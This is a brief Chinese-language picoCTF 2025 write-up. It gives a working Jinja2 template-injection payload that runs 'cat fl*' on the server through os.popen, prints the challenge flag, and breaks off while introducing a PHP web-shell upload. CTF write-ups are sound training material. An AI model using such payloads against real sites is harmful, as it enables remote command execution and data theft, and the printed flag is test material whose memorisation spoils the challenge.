picoCTF 2025 Web Exploitation Write-up
0x00 SSTI1 題目描述 首先使用 Wappalyzer 工具識別目標網站的技術棧: 發現關鍵資訊: 後端框架:Python Flask 模板引擎:Jinja2(Flask 預設) 可能存在 SSTI 漏洞 解題過程 使用基礎數學運算測試是否存在模板注入: Payload: {{9*9}} 確認存在 SSTI 漏洞,模板引擎執行了數學運算 針對 Flask/Jinja2 環境構造 payload: {{request.application.__globals__.__builtins__.__import__('os').popen('cat fl*').read()}} Payload 解析: request.application.__globals__: 存取 Flask 應用程式的全域變數 __builtins__: 存取 Python 內建函數 __import__('os'): 匯入 os 模組 popen('cat fl*'): 執行系統命令讀取 flag 檔案 Flag: picoCTF{s4rv3r_s1d3_t3mp14t3_1nj3ct10n5_4r3_c001_753eca43} 0x01 n0s4n1ty 1 題目描述 存取目標網站發現檔案上傳功能,使用 Wappalyzer 識別技術棧: 發現關鍵資訊: 後端:PHP 可能存在檔案上傳漏洞 可嘗試上傳 Web Shell 解題過程 針對 PHP 後端建立簡單的 Web Shell: ...